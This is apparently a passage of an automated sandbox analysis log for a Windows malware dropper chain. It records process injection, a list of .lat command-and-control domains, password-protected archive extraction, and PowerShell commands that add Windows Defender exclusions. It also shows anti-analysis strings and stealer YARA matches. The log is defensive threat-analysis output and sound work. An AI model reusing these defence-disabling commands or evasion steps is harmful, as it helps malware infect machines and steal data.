                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 140764000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 140765000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Memory written: PID: 7580 base: 9B0010 value: 00
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
                      Source: 77594b3442.exe, 00000031.00000003.2858884734.00000000047E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sweepyribs.lat
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Thread register set: target process: 2368
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Thread register set: target process: 7580
                      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe "C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe "C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe "C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe "C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe "C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode 65,10
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe "C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Process created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Process created: unknown unknown
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Process created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Process created: unknown unknown
                      Source: 9d4ddc637a.exe, 0000003A.00000002.3176645675.0000000000EA2000.00000002.00000001.01000000.00000020.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: 77594b3442.exe, 00000039.00000002.3105827870.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmp | Binary or memory string: ]Program Manager
                      Source: file.exe, file.exe, 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: OProgram Manager
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Code function: 11_2_0021D670 cpuid
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019016001\wNFfgZ1.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019016001\wNFfgZ1.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\System32\WinMetadata\Windows.Globalization.winmd VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Controls.Ribbon\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Controls.Ribbon.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.WindowsRuntime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.InteropServices.WindowsRuntime.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\System32\WinMetadata\Windows.Data.winmd VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WPFED71.tmp VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: unknown VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: unknown VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0006CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_0006CBEA
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 11_2_0021DBA0 GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress, 11_2_0021DBA0
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
                      Source: 77594b3442.exe, 00000031.00000003.3137575871.0000000000524000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match File source: 0.2.file.exe.50000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.2.skotes.exe.6f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000003.1764848025.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
